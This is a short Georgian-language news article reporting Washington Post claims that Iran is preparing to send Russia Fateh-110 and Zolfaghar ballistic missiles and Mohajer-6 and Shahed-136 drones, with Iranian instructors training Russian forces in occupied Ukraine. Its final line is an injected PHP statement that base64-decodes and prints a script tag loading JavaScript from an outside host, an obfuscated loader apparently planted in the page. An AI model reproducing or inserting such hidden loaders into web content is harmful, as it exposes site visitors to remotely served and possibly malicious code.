celsiusi
ავერსი საქკაბელი
„ვაშინგტონ პოსტის“ ინფორმაციით, ირანი რუსეთს მოკლე მანძილზე მოქმედ რაკეტებს მიაწვდის. როგორც გავლენიანი ამერიკული გამოცემა იუწყება, 18 სექტემბერს თეირანმა ოფიციალური პირები გაგზავნა რუსეთში, რათა მოსკოვისთვის დამატებითი შეიარაღების მიწოდების შესახებ გარიგება დაასრულონ.
 
ამერიკულ დაზვერვაში ამტკიცებენ, რომ ირანი მზადაა, რუსეთს გადასცეს დრონები და ასევე, მოკლე მანძილზე მოქმედი ბალისტიკური რაკეტები „ფატეხ-110“ და „ზოლფაგარი“. ამ რაკეტებით სამიზნის განადგურება 300-700 კილომეტრზეა შესაძლებელი.
 
„ვაშინგტონ პოსტი“ ასევე წერს, რომ ირანი მზადაა, მიაწოდოს მოსკოვს ათეულობით უპილოტო საფრენი აპარატი. საუბარია დრონებზე „მოხაჯირ-6“ და „შახედ-136“.
 
გამოცემა ასევე წერს, რომ ირანელი ინსტრუქტორები იმყოფებოდნენ რუსეთის მიერ ოკუპირებულ უკრაინის ტერიტორიებზე და რუს სამხედროებს დრონების გამოყენება შეასწავლეს.
442
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");